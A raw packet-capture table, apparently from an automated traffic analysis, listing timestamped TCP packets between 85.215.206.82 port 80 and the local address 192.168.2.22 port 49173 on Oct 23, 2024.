                                                                                                                                                                        Oct 23, 2024 17:27:18.644866943 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.644928932 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.667862892 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.667913914 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.667932034 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.667943954 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.668019056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668029070 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.668035030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668081045 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.668246031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668304920 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668319941 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668349981 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.668411016 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668426037 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.668458939 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.707550049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.707608938 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.707770109 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.709357023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.709455967 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.709533930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.742485046 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742508888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742527962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742816925 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.764025927 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764056921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764101982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764117002 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.764153957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764246941 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.786971092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.786992073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787019014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787034988 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787051916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787089109 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787666082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787683964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787703991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787765980 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.788018942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788063049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788078070 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788108110 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.828430891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828464031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828483105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828538895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828545094 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.828571081 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.847625971 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.847683907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.847697973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861789942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861821890 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861839056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861840010 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.861881971 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.883548021 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883593082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883608103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883637905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883666039 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.883708000 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906105995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906272888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906287909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906306982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906323910 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906342983 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906354904 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906378031 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906833887 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906851053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906867027 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906982899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906982899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.907135963 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907201052 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907205105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907243967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.947856903 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947880030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947901011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947978973 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981102943 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981127024 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981137991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981161118 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981179953 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981194973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981210947 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981280088 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.002840996 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002857924 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002873898 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002929926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025686026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025754929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025772095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025834084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025854111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025876999 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025876999 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025929928 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025933981 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.026010990 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026026964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026062012 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.026135921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026151896 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026181936 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.066957951 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.066993952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.067012072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.067131996 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.100331068 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100357056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100398064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100492001 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100507021 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100533009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.100533009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.122082949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122103930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122119904 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122289896 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.144670010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144695044 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144710064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144754887 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144772053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144815922 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144856930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.144857883 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.144857883 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.145307064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.145359039 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.145387888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.145404100 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.145450115 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.145483017 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.145498991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.145549059 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.185993910 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.186017990 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.186037064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.186103106 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.219357014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219392061 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219408035 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219486952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219558954 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.219558954 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.219676018 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219724894 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.219748974 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219779015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219846964 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.219886065 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219902039 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.219955921 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.241009951 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.241079092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.241095066 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.241203070 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.264012098 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264058113 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264074087 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264163971 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264182091 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264230967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.264230967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.264417887 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264458895 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.264537096 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264554024 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.264599085 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.264605045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.305074930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.305102110 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.305116892 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.305221081 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.338689089 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338713884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338732958 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338749886 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338906050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338922977 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338954926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.338954926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.338967085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.338975906 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.338984013 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.339044094 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.339626074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.339677095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.339690924 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.339723110 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.360388041 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.360474110 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.360567093 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.360583067 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.360724926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.383145094 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383162975 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383182049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383244991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383301973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383344889 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.383344889 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.383409023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383426905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383459091 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.383460045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.383507967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.432707071 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.432729006 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.432748079 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.432771921 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.457685947 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457701921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457717896 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457809925 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457828045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457839012 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.457918882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.457966089 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.457966089 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.457972050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458544970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458570004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458601952 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.458779097 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458822966 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458827019 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.458841085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.458884954 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.479760885 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479778051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479789972 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479899883 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479948997 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479967117 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.479996920 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.479996920 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.480031967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.502770901 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.502808094 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.502820015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.502911091 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.502923012 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.503004074 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.503004074 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.503174067 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.503209114 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.503220081 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.503262043 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.543304920 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.543337107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.543351889 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.543586969 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.577008009 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577033997 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577044964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577111959 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577142000 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.577182055 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577193975 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577205896 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577316046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.577316046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.577617884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577671051 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.577678919 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577692032 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.577725887 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.599061012 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599076033 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599087954 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599148035 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599160910 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599208117 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.599380970 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.599386930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599411964 CEST804917385.215.206.82192.168.2.22
